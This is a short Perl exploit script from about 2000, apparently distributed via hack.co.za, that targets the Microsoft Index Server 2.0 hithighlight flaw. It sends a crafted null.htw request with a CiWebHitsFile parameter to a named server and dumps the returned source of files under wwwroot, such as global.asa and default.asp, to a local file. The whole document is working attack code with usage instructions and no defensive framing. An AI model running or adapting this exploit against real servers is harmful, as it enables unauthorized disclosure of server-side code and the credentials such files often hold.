#!/usr/bin/perl
#
###########################################################################################
# exploit for Microsoft Index Server 2.0 hithighlight exploit which allows you
# to view any file in the wwwroot directory and down.
#
#  sage: perl sourceview.pl www.server.com (files in wwwroot and down)
#                                             /global.asa /default.asp etc...
#
$sploitname="\t\t\t\<ms \%20 vuln file snatcher exploit by \\x00\\x00\>\n";
#
###########################################################################################
#
#############################
use IO::Socket;       [2000]# special shoutouts to govboi
my ($port, $sock,$server);  # from x00x00
$size=0;              [2000]# ooo2 release
#############################
#
$server="$ARGV[0]";
$s="$server";
$F="";
$port="80";
$cm="$ARGV[1]";
&connect;

sub connect {
  $ver="GET /null.htw?CiWebHitsFile=$cm+&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n";
  my($iaddr,$paddr,$proto);
  $iaddr = inet_aton($server) || die "Error: $!";
  $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
  $proto = getprotobyname('tcp') || die "Error: $!";
  socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
  connect(SOCK, $paddr) || die "Error: $!";
  send(SOCK, $ver, 0) || die "Can't to send packet: $!";
  open(OUT, ">x.txt");
  print $sploitname;
  print "\t\<\!\> \<\!\> \<\!\> dumping $cm to x.txt \n";
  while(<SOCK>) {
    print OUT <SOCK>;
  }
  close OUT;
  $n=0;
  $type=2;

  close(SOCK);
  exit(1);
}
#                    www.hack.co.za              [2000]#